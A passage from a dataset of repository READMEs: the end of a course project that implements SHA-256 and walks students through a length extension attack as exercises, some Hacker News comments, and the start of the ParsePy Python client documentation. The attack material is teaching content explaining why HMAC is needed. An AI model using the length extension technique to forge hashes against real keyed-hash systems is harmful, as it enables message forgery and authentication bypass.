`hashlib`\nor against any other SHA-256 implementation in the world, and your output will\nbe exactly the same. Knock on wood.\n\nAs we did with block ciphers, we're going to pad the message and split it up\ninto blocks. Let's look at that Merkle\u2013Damg\u00e5rd diagram again:\n\n\"Merkle\u2013Damg\u00e5rd\n\nM1, M2, and so on represent 64-byte blocks of the padded\nmessage. There are as many M blocks as needed, depending on the padded message\nlength. The output state (\"chaining value\") returned by each call to the\ncompression function (H1, H2, and so on) becomes the\ninput state for the following call. And the final chaining value returned by\nthe last call to the compression function is the SHA-256 hash of the message.\n\nYou might've noticed one last missing detail: Where do we get H0,\nthe input state for the first call to the compression function? We'll use a\nconstant for this. As in CBC mode, we'll call this constant the \"initialization\nvector\", or IV for short. Unlike CBC mode, where the IV needs to be uniformly\nrandom every time, the SHA-256 IV never changes. It's baked into the standard.\nThis is the other set of constants at the top of the [Wikipedia\npseudocode](https://en.wikipedia.org/wiki/SHA-2#Pseudocode). Paste the\nfollowing into your Python code as another global variable:\n\n```python\nIV = [\n 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a,\n 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19,\n]\n```\n\nNow, write a function like\n[`sha256(message)`](https://youtu.be/6v5VahaEL7s?t=438). Inside it, use your\n`padding()` function to generate padding bytes, and then append them to the\nmessage bytes. Note that nothing should be hex-encoded at this point. (Using\nhex-encoded padding here is a _common mistake_.) Create a `state` variable,\nwhose starting value is `IV`. Then split the padded message up into 64-byte\nblocks and loop over the blocks, calling your `compress()` function on each\none. For each call to `compress()`, use the current `state` value as input and\nassign the return value back to `state`. Double check that your argument types\nfor `compress()` are the same as they were in Problem 11. (Calling\n`compress()` with block bytes here but block words there is another _common\nmistake_.) Once the block loop is finished, convert the final value of `state`\ninto 32 bytes by encoding each of the 8 state words as a 4-byte **big endian**\ninteger and concatenating them. Those 32 bytes are the return value of\n`sha256()`.\n\n> Debugging tips: Even if you've passed tests for all the previous problems,\n> and your `sha256()` function looks good, sometimes you can still get the\n> wrong answer here. Look carefully for the common mistakes described above.\n> Also look for accidental global variables in your functions, which might\n> refer to input from a previous problem. If you get stuck, put print\n> statements everywhere, and compare what you see to these [known-good debug\n> printouts for\n> `sha256(b\"\")`](https://gist.github.com/oconnor663/27804bb33542bbf398aab16e102d8594).\n\nYour input for this problem is a list of ASCII strings. Convert each string to\nbytes and hash it with your `sha256()` function. Your output should be a list\nof the resulting SHA-256 hashes, each encoded as hex.\n\n**Input:** a list of ASCII strings\n\n**Output:** a list of the hex-encoded SHA-256 hashes of those strings\n\n\n \"I\n\n\n## The Length Extension Attack\n\nIf we were to stop here, all our blood, sweat, and tears would not have been\nwasted. Implementing SHA-256 is an accomplishment in itself, and the intuition\nyou've gained along the way will hopefully be useful to you whenever you see a\nhash function from now on. But besides that broad intuition, you've also\nlearned some very specific tricks: Now you know how to invoke the SHA-256\ncompression and padding functions directly, which isn't something that most\nlibrary implementations will let you do. It turns out that you can use these\ntricks to pull off an important attack, and the best time to learn this attack\nis while the tricks are still fresh in your mind. Strike while the iron is hot,\nas they say.\n\nSHA-256 has a flaw. Although its collision resistance and other security\nproperties remain unbroken so far, it does *not* behave like a true [\"random\noracle\"](https://en.wikipedia.org/wiki/Random_oracle). Some SHA-256 outputs are\n_related_ to each other, in a way that you can detect or exploit even when you\ndon't know the input. This exploit is called a \"length extension attack\".\n\nRemember how the \"chaining values\" worked in Problem 13. The output from\neach call to the compression function became the input for the next call. But\nthe final output, well, it just became the hash. We didn't do anything special\nto it; we just returned it. That means that if you look at a SHA-256 hash,\nyou're looking at the same state that _would have been used_ to call the\ncompression function again _if there had been more input._\n\nThis was a design mistake. (The designers actually knew about this issue at the\ntime but didn't consider it important.) Here's the problem: Suppose you're an\nattacker, and you're looking at a hash that I've published. Let's say you don't\nknow what input I used, maybe because I included a secret key or something like\nthat. Because of this mistake, even though you don't know my input, you can\nconstruct a _new_ hash, which matches a _different_ input, one which starts\nwith the _same bytes as mine_ but then has some extra bytes of your choosing\nadded to the end. If SHA-256 hashes were truly independent of each other, this\nwouldn't be possible, but they aren't, and it is possible.\n\nThere's one thing standing between you and this attack: the padding. I didn't\ndo anything special to the last chaining value, but I did pad my input. Those\npadding bytes went into the state that you're looking at, and there's no way\nfor you to unmix them. But you can live with that, by making a clever\ncompromise:\n\n*Pretend that my padding bytes are part of your chosen suffix.*\n\nThat is to say, you can't extend my input with a totally arbitrary suffix, but\nyou can choose any suffix that starts with my padding bytes. That's an\nimportant limitation, but it still allows for quite a lot of mischief.\n\nIf you're reading through this project before we've covered Chapter 7 of\n*Serious Cryptography*, it might not yet be clear why this attack is important.\nThe short answer is, this attack is why we need an algorithm called\n[HMAC](https://en.wikipedia.org/wiki/HMAC) for keyed hashing, and programmers\nwho don't know about HMAC often misuse hash functions in ways that are\nvulnerable to this attack. We'll get to HMAC in class shortly, if we haven't\nalready. For now, let's see the length extension attack in action.\n\n### Problem 14: modeling the extended input\n\nLet's say my original input is 55 bytes long. I've chosen that length because\nit's the most that still fits in one 64-byte block after padding is added.\nWhat's the padding in this case? Let's use our `padding()` function to see it:\n\n```\n>>> padding(55)\nb'\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xb8'\n>>> padding(55).hex()\n'8000000000000001b8'\n```\n\nWe can recognize the pieces there. One 0x80 byte at the front, no extra 0x00\nbytes in this case, and an 8-byte big-endian integer encoding the value\n0x01b8 = 440 = 8 * 55, which is my input length\nin bits. My original 55 bytes and these 9 bytes of padding are 64 bytes put\ntogether, exactly one block. Clear so far?\n\nNow put your attacker hat back on. You're going to pretend that those padding\nbytes are actually the start of your chosen suffix. Then you're going to add\nany number of additional suffix bytes of your choosing. The resulting\n\"synthetic\" input, which you're ultimately going to compute the hash of, will\nbe equivalent to my original, plus my padding, plus the rest of your chosen\nsuffix. Let's say my original input was fifty-five `0xaa` bytes, and you chose\nthree `0xff` bytes for your suffix. In that case the synthetic message,\nrepresented here as a hex-encoded string that I've split over a few lines,\nwould be:\n\n```\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <-- the first 32-byte half of the first block\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa8000000000000001b8 <-- the second 32-byte half of the first block\nffffff <-- the second block, 3 bytes *before* padding\n```\n\nTo be clear, we won't construct this complete synthetic string ourselves when\nwe perform the length extension attack. In fact, we can't. All those `0xaa`\nbytes in my original input are hidden from the attacker. But this synthetic\nstring is what our final length-extended hash will *represent*, and we want to\nmodel it in this problem.\n\nYour input for this problem is an object with two fields, `\"original_input\"`\ncontaining an ASCII string that we want to extend, and `\"chosen_suffix\"`\ncontaining the ASCII string that we want to extend it with. Convert these\nstrings to bytes, and construct the synthetic message with padding in the\nmiddle that a length extension attack would compute the hash of. Your output\nshould be this synthetic string, encoded as hex.\n\n**Input:** an object with two fields, `\"original_input\"` and `\"chosen_suffix\"`\n\n**Output:** the synthetic message, encoded as hex\n\n### Problem 15: recovering the state\n\nThe length extension attack will reuse a hash as a chaining value, feeding it\ninto additional calls to the compression function. However, you might remember\nthat there was a conversion step we did when we returned the hash. We converted\nit from 8 words to 32 bytes. We need to undo that and recover the words.\n\nYour input for this problem is a 32-byte hash, encoded as hex. Hex-decode it\ninto bytes. Then convert it back into a list of 8 words, by breaking it into\ngroups of 4 bytes and parsing each 4-byte group as a **big-endian** integer.\nYour output should be that list.\n\n**Input:** a 32-byte hash, encoded as hex\n\n**Output:** the list of 8 state words recovered from the hash\n\n### Problem 16: the length extension attack\n\nWe're ready to perform the attack. Your input for this problem will be an\nobject with three fields, `\"original_hash\"`, `\"original_len\"`, and\n`\"chosen_suffix\"`. Hex-decode the original hash and convert the chosen suffix\nto ASCII bytes. Recover the list of 8 state words from the original hash, as\nyou did in Problem 15 above.\n\nNow, to begin the attack, _re-pad_ the chosen suffix, like you padded the\nregular message in Problem 13. However, instead of calling your\n`padding()` function with the length of the suffix itself, call it with the\n*total length of the synthetic message*. That is, the original input length,\nplus the length of the original input's padding, plus the length of the suffix.\n(This makes your padding bytes different, but it doesn't change _how many_\npadding bytes you get. Can you see why?)\n\nNext, hash the padded suffix by looping over its blocks and calling\n`compress()` on each of them, again as you did in Problem 13. However,\ninstead of using `IV` for your initial state, use the state words that you\nrecovered from the original hash.\n\nOnce you've compressed all the resulting blocks, the attack is finished.\nConvert your list of 8 state words back into 32 bytes, using the same method as\nin Problem 13. Your output for this problem should be the resulting hash,\nencoded as hex.\n\nThe input for the `\"original_hash\"` given in `example_input.json` was `elephant\njaguar vulture octopus butterfly`. You don't need to know that to extend it,\nbut if you like, you can check that the output is indeed a valid extension of\nthat original string as an exercise.\n\n**Input:** an object with three fields, `\"original_hash\"`, `\"original_len\"`, and `\"chosen_suffix\"`\n\n**Output:** the length-extended hash, encoded as hex\n\n\n \"he\n\n\n## Conclusion\n\nThe project is finished, and there are no more questions. If you've made it\nthis far, then you know more about the insides of a hash function than many\ncryptographers do. That's something to be proud of, and I hope you'll find that\nit was worth the trouble.\n\nIf you're tired of hashing and ready for a break, no need to read any further.\nBut if you found all this very interesting and you're eager to learn more,\nthere are many different avenues to explore. Here are a few:\n\n- In Problem 13, we implemented \"all-at-once\" hashing. That is, the entire\n input string was provided as an argument. In practice however, most hash\n functions are designed to work incrementally, piece-by-piece. When the input\n is very large, they read smaller chunks of it in a loop, so that the\n application doesn't need to allocate lots of memory for a large string.\n Python's `hashlib` module provides the\n [`.update()`](https://docs.python.org/3/library/hashlib.html#hashlib.hash.update)\n method for this. You can try refactoring your own SHA-256 code to support\n some sort of \"update\" function, which can be called multiple times. You'll\n need to think about how to \"buffer\" input when what you're given isn't an\n exact multiple of 64 bytes.\n\n- More recent designs like SHA-3, BLAKE2, and BLAKE3 prevent length extension\n attacks by making sure that their chaining values and their published hashes\n are different from each other in some way. This prevents an attacker from\n looking at a hash and recovering the chaining value that would have been used\n to compress more input, like we did in Problems 15 and 16. Think about ways\n you might modify SHA-256 to prevent this. What if the compression function\n was implemented in hardware, and you weren't allowed to change it?\n\n- The Merkle\u2013Damg\u00e5rd contruction is very common, but there are other ways to\n organize things. SHA-3 uses a \"sponge construction\" (p. 115), and BLAKE3 uses\n a \"Merkle tree\" (named after the same Ralph Merkle). These different\n structures can have a variety of different benefits. You might compare and\n contrast your SHA-256 code with [this Python implementation of\n SHA-3](https://github.com/coruus/py-keccak/blob/master/fips202/keccak.py),\n especially the part where they use `permute()` instead of `compress()`.\n\n- Some use cases, particularly hash tables (dictionaries in Python), can\n tolerate collisions. For these cases, it's common to use a faster hash\n function with a smaller state and a shorter output. See for example\n [SipHash](https://en.wikipedia.org/wiki/SipHash), also designed by J.P.\n Aumasson, the author of [our textbook](https://nostarch.com/seriouscrypto).\n SipHash is used by default in the Rust\n [`HashMap`](https://doc.rust-lang.org/std/collections/struct.HashMap.html),\n for example. But note that even though hash tables/maps don't need collision\n resistance per se, they often do need some related security properties,\n because they can be [vulnerable to DOS\n attacks](https://www.anchor.com.au/blog/2012/12/how-to-explain-hash-dos-to-your-parents-by-using-cats/)\n if an attacker is able to produce too many collisions.\n\n- Some applications need a hash function with more exotic properties. For\n example, you might be familiar with the `rsync` command for copying files\n over a network. Rsync uses a [\"rolling\n hash\"](https://en.wikipedia.org/wiki/Rolling_hash) to efficiently detect\n blocks that are the same between two different versions of a file. Rolling\n hashes look quite different from cryptographic hash functions, and they\n usually don't make strong security guarantees. If you have access to a remote\n server, you can play with making a tiny change to a large file, and see how\n long it takes Rsync to pick up the change.\n\nHappy hashing.\n", "readme_type": "markdown", "hn_comments": "I really like this. Cryptography is obviously very hard to get right and complex, and for that reason people have said \"don't roll your own crypto\" - but really, that's stupid. What we need is accessible information to explain cryptography to people, so they know how to make smart crypto decisions, know what pitfalls exist, etc.I think crypto has done a particularly bad job of providing accessible materials, historically, and has had a terrible attitude towards doing so. Things are changing, and that's nice.Wrote a similar article, in Barbarian language for the German audience here, and completely in Python.I found it really difficult to find written and understandable material for this topic. Mostly people posts Youtube clickbait videos about that.Though, this one goes far beyond the simple process. So I almost don't dare to compare my profane post to this elaborarte description.\"Wie funktioniert der SHA256 Algorithmus\u2026im Detail? (Teil 1/2) \u2013 nicky reinert\" https://nickyreinert.de/blog/2021/10/31/wie-funktioniert-der...I found this video to be an excellent explanation and sufficient to implement the algorithm: https://www.youtube.com/watch?v=f9EbD6iY9zICode: https://gist.github.com/void4/6f5ff23a3df81d6115fceb6adefddd...This site contains a nice visualization: https://sha256algorithm.com/I wonder how the newer hashes, like Reinforced Concrete, that are used in Zero-Knowledge applications compare to SHA-256.I mean can Reinforced Concrete replace SHA-256, as the primary hash, in a blockchain?Proof-of-work cryptocurrencies moved toward complex hash functions that are \"ASIC resistant\" in order to attempt to keep mining power as distributed as possible (for CPUs), because whatever highly-funded manufacturer designs the most-optimized and fastest ASICs gains concentrated mining power. ASIC hash/W efficiency doubles every couple of years, so using them as heaters becomes cost-ineffective as difficulty adjusts.But what if we turned this all on its head and intentionally designed a hash function that is \"ASIC optimized\" so that the perfect ASIC miner design could be found quickly (perhaps at its very conception), and miners became a generic commodity item, \"grey goo miners\", and used them as space heaters in cold climates, or maybe even wherever electric heating was needed in industry? That way mining would be as distributed as the need for electric heating, and its energy would be put to good use. It might also put a ceiling on the total electricity consumed because it would be hard to compete with any miner whose electric bills are \"free\" (relatively).The most interesting part of this is the section on Length Extension Attack. Implementing SHA256 isn't all that interesting since it's just a mechanistic translation of an algorithm, but the attack shows off one of the implications of how the function works.I was hoping this would explain a bit more about why the algorithm does the things it does. Do we have proofs for why certain types of mixing are more secure than others?Also, it's funny how even world-class cryptographers can think it's perfectly fine to directly output internal state as the digest. Some things are only obvious in retrospect.OP appears to be Jack O'Connor, one of the designers of BLAKE3, which is the fastest full-strength cryptographic hash function currently available. It's always nice to see practicing cryptographers also producing digestible cryptography content.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "milesrichardson/ParsePy", "link": "https://github.com/milesrichardson/ParsePy", "tags": ["parse-server", "python", "parse"], "stars": 516, "description": "A relatively up-to-date fork of ParsePy, the Python wrapper for the Parse.com API. Originally maintained by @dgrtwo ", "lang": "Python", "repo_lang": "", "readme": "Note: As of May 13, 2016, this repository (`milesrichardson/ParsePy)` is the\nmost up-to-date and active python client for the Parse API. It supports self-hosted\n`parse-server` via the REST API. Note that some features will not work with parse-server,\nif they are not supported by the REST API (e.g. push).\n\nSee the section below, \"using with self-hosted parse-server,\" for instructions.\n\nparse_rest\n==========\n\n**parse_rest** is a Python client for the [Parse REST\n API](http://docs.parseplatform.org/rest/guide). It provides:\n\n - Python object mapping for Parse objects with methods to save,\n update, and delete objects, as well as an interface for querying\n stored objects.\n - Complex data types provided by Parse with no python equivalent\n - User authentication, account creation** (signup) and querying.\n - Cloud code integration\n - Installation querying\n - push\n - Roles/ACLs**\n - Image/File type support (done 1/14/17)\n\n\n** for applications with access to the MASTER KEY, see details below.\n\n\nInstallation\n------------\n\nThe easiest way to install this package is by downloading or\ncloning this repository:\n\n pip install git+https://github.com/milesrichardson/ParsePy.git\n\nNote: The version on [PyPI](http://pypi.python.org/pypi) is not\nup-to-date. The code is still under lots of changes and the stability\nof the library API - though improving - is not guaranteed. Please\nfile any issues that you may find if documentation/application.\n\n\nUsing with self-hosted `parse-server`\n-------------\n\nTo use the library with self-hosted parse-server, set the environment variable\n`PARSE_API_ROOT` before importing the module.\n\nExample:\n\n~~~~~ {python}\nimport os\nos.environ[\"PARSE_API_ROOT\"] = \"http://your_server.com:1337/parse\"\n\n# Everything else same as usual\n\nfrom parse_rest.datatypes import Function, Object, GeoPoint\nfrom parse_rest.connection import register\nfrom parse_rest.query import QueryResourceDoesNotExist\nfrom parse_rest.connection import ParseBatcher\nfrom parse_rest.core import ResourceRequestBadRequest, ParseError\n\nAPPLICATION_ID = '...'\nREST_API_KEY = '...'\nMASTER_KEY = '...'\n\nregister(APPLICATION_ID, REST_API_KEY, master_key=MASTER_KEY)\n~~~~~\n\n\nTesting\n-------\n\nTo run the tests, you need to:\n\n* create a `settings_local.py` file in your local directory with three\n variables that define a sample Parse application to use for testing:\n\n~~~~~ {python}\nAPPLICATION_ID = \"APPLICATION_ID_HERE\"\nREST_API_KEY = \"REST_API_KEY_HERE\"\nMASTER_KEY = \"MASTER_KEY_HERE\"\n~~~~~\n\nNote Do **not** give the keys of an existing application with data you want to\nkeep: create a new one instead. The test suite will erase any existing CloudCode\nin the app and may accidentally replace or change existing objects.\n\n* install the [Parse CloudCode tool](http://docs.parseplatform.org/cloudcode/guide/)\n\nYou can then test the installation by running the following command:\n\n # test all\n python -m unittest parse_rest.tests\n\n # or test individually\n python -m unittest parse_rest.tests.TestObject.testCanCreateNewObject\n\nUsage\n-----------\n\nBefore the first interaction with the Parse server, you need to\nregister your access credentials. You can do so by calling\n`parse_rest.connection.register`.\n\nBefore getting to code, a word of caution. You need to consider how your application is\nmeant to be deployed. Parse identifies your application through\ndifferent keys (available from your Parse dashboard) that are used in\nevery request done to their servers.\n\nIf your application is supposed to be distributed to third parties\n(such as a desktop program to be installed), you SHOULD NOT put the\nmaster key in your code. If your application is meant to be running in\nsystems that you fully control (e.g, a web app that needs to integrate\nwith Parse to provide functionality to your client), you may also add\nyour *master key*.\n\n~~~~~ {python}\nfrom parse_rest.connection import register\nregister(, [, master_key=None])\n~~~~~\n\nOnce your application calls `register`, you will be able to read, write\nand query for data at Parse.\n\n\nData types\n----------\n\nParse allows us to get data in different base types that have a direct\npython equivalent (strings, integers, floats, dicts, lists) as well as\nsome more complex ones (e.g.:`File`, `Image`, `Date`). It also allows\nus to define objects with schema-free structure, and save them, as\nwell to query them later by their attributes. `parse_rest` is\nhandy as a way to serialize/deserialize these objects transparently.\n\nThe Object type\n---------------\n\n\nIn theory, you are able to simply instantiate a `Object` and do\neverything that you want with it, save it on Parse, retrieve it later,\netc.\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nfirst_object = Object()\n~~~~~\n\nIn practice, you will probably want different classes for your\napplication to allow for a better organization in your own code.\nSo, let's say you want to make an online game, and you want to save\nthe scoreboard on Parse. For that, you decide to define a class called\n`GameScore`. All you need to do to create such a class is to define a\nPython class that inherts from `parse_rest.datatypes.Object`:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nclass GameScore(Object):\n pass\n~~~~~\n\nYou can also create an Object subclass by string name, with the `Object.factory`\nmethod:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nmyClassName = \"GameScore\"\nmyClass = Object.factory(myClassName)\n\nprint myClass\n# \nprint myClass.__name__\n# GameScore\n~~~~~\n\nYou can then instantiate your new class with some parameters:\n\n~~~~~ {python}\ngameScore = GameScore(score=1337, player_name='John Doe', cheat_mode=False)\n~~~~~\n\nYou can change or set new parameters afterwards:\n\n~~~~ {python}\ngameScore.cheat_mode = True\ngameScore.level = 20\n~~~~\n\nTo save our new object, just call the save() method:\n\n~~~~~ {python}\ngameScore.save()\n~~~~~\n\nIf we want to make an update, just call save() again after modifying\nan attribute to send the changes to the server:\n\n~~~~~ {python}\ngameScore.score = 2061\ngameScore.save()\n~~~~~\n\nYou can also increment the score in a single API query:\n\n~~~~~ {python}\ngameScore.increment(\"score\")\n~~~~~\n\nNow that we've done all that work creating our first Parse object, let's delete it:\n\n~~~~~ {python}\ngameScore.delete()\n~~~~~\n\nThat's it! You're ready to start saving data on Parse.\n\nObject Metadata\n---------------\n\nThe attributes objectId, createdAt, and updatedAt show metadata about\na _Object_ that cannot be modified through the API:\n\n~~~~~ {python}\ngameScore.objectId\n# 'xxwXx9eOec'\ngameScore.createdAt\n# datetime.datetime(2011, 9, 16, 21, 51, 36, 784000)\ngameScore.updatedAt\n# datetime.datetime(2011, 9, 118, 14, 18, 23, 152000)\n~~~~~\n\nAdditional Datatypes\n--------------------\n\nWe've mentioned that Parse supports more complex types, most of these\ntypes are also supported on Python (dates, files). So these types can\nbe converted transparently when you use them. For the types that Parse\nprovided and Python does not support natively, `parse_rest` provides\nthe appropiates classes to work with them. One such example is\n`GeoPoint`, where you store latitude and longitude\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object, GeoPoint\n\nclass Restaurant(Object):\n pass\n\nrestaurant = Restaurant(name=\"Los Pollos Hermanos\")\n# coordinates as floats.\nrestaurant.location = GeoPoint(latitude=12.0, longitude=-34.45)\nrestaurant.save()\n~~~~~\n\nWe can store a reference to another Object by assigning it to an attribute:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object\n\nclass CollectedItem(Object):\n pass\n\ncollectedItem = CollectedItem(type=\"Sword\", isAwesome=True)\ncollectedItem.save() # we have to save it before it can be referenced\n\ngameScore.item = collectedItem\n~~~~~\n\n\nFile Support\n---------------\n\nYou can upload files to parse (assuming your `parse-server` instance supports it).\nThis has been tested with the default GridStore adapter.\n\nExample:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Object, File\n\nclass GameScore(Object):\n pass\n\n# 1. Upload file\n\nwith open('/path/to/screenshot.png', 'rb') as fh:\n rawdata = fh.read()\n\nscreenshotFile = File('arbitraryNameOfFile', rawdata, 'image/png')\nscreenshotFile.save()\n\nprint screenshotFile.url\n\n# 2. Attach file to gamescore object and save\ngs = GameScore.Query.get(objectId='xxxxxxx')\ngs.screenshot = screenshotFile\ngs.save()\n\nprint gs.file.url\n~~~~~\n\n\nBatch Operations\n----------------\n\nFor the sake of efficiency, Parse also supports creating, updating or deleting objects in batches using a single query, which saves on network round trips. You can perform such batch operations using the `connection.ParseBatcher` object:\n\n~~~~~ {python}\nfrom parse_rest.connection import ParseBatcher\n\nscore1 = GameScore(score=1337, player_name='John Doe', cheat_mode=False)\nscore2 = GameScore(score=1400, player_name='Jane Doe', cheat_mode=False)\nscore3 = GameScore(score=2000, player_name='Jack Doe', cheat_mode=True)\nscores = [score1, score2, score3]\n\nbatcher = ParseBatcher()\nbatcher.batch_save(scores)\nbatcher.batch_delete(scores)\n~~~~~\n\nYou can also mix `save` and `delete` operations in the same query as follows (note the absence of parentheses after each `save` or `delete`):\n\n~~~~~ {python}\nbatcher.batch([score1.save, score2.save, score3.delete])\n~~~~~\n\nIf an error occurs during one or multiple of the operations, it will not affect\nthe execution of the remaining operations. Instead, the `batcher.batch_save` or\n`batcher.batch_delete` or `batcher.batch` will raise a `ParseBatchError`\n(child of `ParseError`) exception with `.message` set to a *list* of the errors\nencountered. For example:\n\n~~~~~ {python}\n# Batch save a list of two objects:\n# dupe_object is a duplicate violating a unique key constraint\n# dupe_object2 is a duplicate violating a unique key constraint\n# new_object is a new object satisfying the unique key constraint\n#\n# dupe_object and dupe_object2 will fail to save, and new_object will save successfully\n\ndupe_object = list(MyClass.Query.all().limit(2))[0]\ndupe_object2 = list(MyClass.Query.all().limit(2))[1]\nnew_object = MyClass(some_column=11111)\nobjects = [dupe_object, dupe_object2, new_object]\n\nbatcher = ParseBatcher()\nbatcher.batch_save(objects)\n~~~~~\n\nwill raise an exception:\n\n~~~~~ {python}\nTraceback (most recent call last):\n File \"\", line 1, in \n File \"/Users/miles/ParsePy/parse_rest/connection.py\", line 199, in batch_save\n self.batch(o.save for o in objects)\n File \"/Users/miles/ParsePy/parse_rest/connection.py\", line 195, in batch\n raise core.ParseBatchError(batched_errors)\n\nParseBatchError: [{u'code': 11000, u'error': u'E11000 duplicate key error index: myapp.MyClass.$my_column_1 dup key: { : 555555 }'}, {u'code': 11000, u'error': u'E11000 duplicate key error index: myapp.MyClass.$my_column_1 dup key: { : 44444 }'}]\n~~~~~\n\nAnd `CRUCIALLY`, the objectId field of the NON-duplicate object will be correctly set:\n\n~~~~~ {python}\n>>> #batch_save as above...\n>>> print objects\n[, , ]\n~~~~~\n\nTherefore, one way to tell which objects saved successfully after a batch save operation\nis to check which objects have `objectId` set.\n\nQuerying\n--------\n\nAny class inheriting from `parse_rest.Object` has a `Query`\nobject. With it, you can perform queries that return a set of objects\nor that will return a object directly.\n\n\n### Retrieving a single object\n\nTo retrieve an object with a Parse class of `GameScore` and an\n`objectId` of `xxwXx9eOec`, run:\n\n~~~~~ {python}\ngameScore = GameScore.Query.get(objectId=\"xxwXx9eOec\")\n~~~~~\n\n### Working with Querysets\n\nTo query for sets of objects, we work with the concept of\n`Queryset`s. If you are familiar with Django you will be right at home\n\\- but be aware that is not a complete implementation of their\nQueryset or Database backend.\n\nThe Query object contains a method called `all()`, which will return a\nbasic (unfiltered) Queryset. It will represent the set of all objects\nof the class you are querying.\n\n~~~~~ {python}\nall_scores = GameScore.Query.all()\n~~~~~\n\nQuerysets are _lazily evaluated_, meaning that it will only actually\nmake a request to Parse when you either call a method that needs to\noperate on the data, or when you iterate on the Queryset.\n\n#### Filtering\n\nLike Django, Querysets can have constraints added by appending the name of the filter operator to name of the attribute:\n\n~~~~~ {python}\nhigh_scores = GameScore.Query.filter(score__gte=1000)\n~~~~~\n\nYou can similarly perform queries on GeoPoint objects by using the `nearSphere` operator:\n\n~~~~~ {python}\nmy_loc = GeoPoint(latitude=12.0, longitude=-34.55)\nnearby_restaurants = Restaurant.Query.filter(location__nearSphere=my_loc)\n~~~~~\n\nYou can see the [full list of constraint operators defined by\nParse](http://docs.parseplatform.org/rest/guide/#query-constraints)\n\n\n#### Sorting/Ordering\n\nQuerysets can also be ordered. Just define the name of the attribute\nthat you want to use to sort. Appending a \"-\" in front of the name\nwill sort the set in descending order.\n\n~~~~~ {python}\nlow_to_high_score_board = GameScore.Query.all().order_by(\"score\")\nhigh_to_low_score_board = GameScore.Query.all().order_by(\"-score\") # or order_by(\"score\", descending=True)\n~~~~~\n\n#### Limit/Skip\n\nIf you don't want the whole set, you can apply the\nlimit and skip function. Let's say you have a have classes\nrepresenting a blog, and you want to implement basic pagination:\n\n~~~~~ {python}\nposts = Post.Query.all().order_by(\"-publication_date\")\npage_one = posts.limit(10) # Will return the most 10 recent posts.\npage_two = posts.skip(10).limit(10) # Will return posts 11-20\n~~~~~\n\n#### Related objects\n\nYou can specify \"join\" attributes to get related object with single query.\n\n~~~~~ {python}\nposts = Post.Query.all().select_related(\"author\", \"editor\")\n~~~~~\n\n#### Composability/Chaining of Querysets\n\nThe example above can show the most powerful aspect of Querysets, that\nis the ability to make complex querying and filtering by chaining calls:\n\nMost importantly, Querysets can be chained together. This allows you\nto make more complex queries:\n\n~~~~~ {python}\nposts_by_joe = Post.Query.all().filter(author='Joe').order_by(\"view_count\")\npopular_posts = posts_by_joe.gte(view_count=200)\n~~~~~\n\n#### Iterating on Querysets\n\nAfter all the querying/filtering/sorting, you will probably want to do\nsomething with the results. Querysets can be iterated on:\n\n~~~~~ {python}\nposts_by_joe = Post.Query.all().filter(author='Joe').order_by('view_count')\nfor post in posts_by_joe:\n print post.title, post.publication_date, post.text\n~~~~~\n\n**TODO**: Slicing of Querysets\n\n\nRelations\n---------\n\nA Relation is field that contains references to multiple objects.\nYou can query this subset of objects.\n\n(Note that Parse's relations are \"one sided\" and don't involve a join table. [See the docs.](http://docs.parseplatform.org/js/guide/#many-to-many))\n\nFor example, if we have Game and GameScore classes, and one game\ncan have multiple GameScores, you can use relations to associate\nthose GameScores with a Game.\n\n~~~~~ {python}\ngame = Game(name=\"3-way Battle\")\ngame.save()\nscore1 = GameScore(player_name='Ronald', score=100)\nscore2 = GameScore(player_name='Rebecca', score=140)\nscore3 = GameScore(player_name='Sara', score=190)\nrelation = game.relation('scores')\nrelation.add([score1, score2, score3])\n~~~~~\n\nA Game gets added, three GameScores get added, and three relations\nare created associating the GameScores with the Game.\n\nTo retreive the related scores for a game, you use query() to get a\nQueryset for the relation.\n\n~~~~~ {python}\nscores = relation.query()\nfor gamescore in scores:\n print gamescore.player_name, gamescore.score\n~~~~~\n\nThe query is limited to the objects previously added to the\nrelation.\n\n~~~~~ {python}\nscores = relation.query().order_by('score', descending=True)\nfor gamescore in scores:\n print gamescore.player_name, gamescore.score\n~~~~~\n\nTo remove objects from a relation, you use remove(). This example\nremoves all the related objects.\n\n~~~~~ {python}\nscores = relation.query()\nfor gamescore in scores:\n relation.remove(gamescore)\n~~~~~\n\n\nUsers\n-----\n\nYou can sign up, log in, modify or delete users as well, using the `parse_rest.user.User` class. You sign a user up as follows:\n\n~~~~~ {python}\nfrom parse_rest.user import User\n\nu = User.signup(\"dhelmet\", \"12345\", phone=\"555-555-5555\")\n~~~~~\n\nor log in an existing user with\n\n~~~~~ {python}\nu = User.login(\"dhelmet\", \"12345\")\n~~~~~\n\nYou can also request a password reset for a specific user with\n\n~~~~~ {python}\nUser.request_password_reset(email=\"dhelmet@gmail.com\")\n~~~~~\n\nIf you'd like to log in a user with Facebook or Twitter, and have already obtained an access token (including a user ID and expiration date) to do so, you can log in like this:\n\n~~~~ {python}\nauthData = {\"facebook\": {\"id\": fbID, \"access_token\": access_token,\n \"expiration_date\": expiration_date}}\nu = User.login_auth(authData)\n~~~~\n\nOnce a `User` has been logged in, it saves its session so that it can be edited or deleted:\n\n~~~~~ {python}\nu.highscore = 300\nu.save()\nu.delete()\n~~~~~\n\nTo get the current user from a Parse session:\n\n~~~~~ {python}\nfrom parse_rest.connection import SessionToken, register\n\n# Acquire a valid parse session somewhere\n# Example: token = request.session.get('session_token')\n\n# Method 1: Using a `with` statement\n# Do this to isolate use of session token in this block only\nwith SessionToken(token):\n me = User.current_user()\n\n# Method 2: register your parse connection with `session_token` parameter\n# Do this to use the session token for all subsequent queries\nregister(PARSE_APPID, PARSE_APIKEY, session_token=token)\nme = User.current_user()\n~~~~~\n\n\nPush\n---------------\n\nYou can also send notifications to your users using [Parse's Push functionality](http://docs.parseplatform.org/rest/guide/#push-notifications), 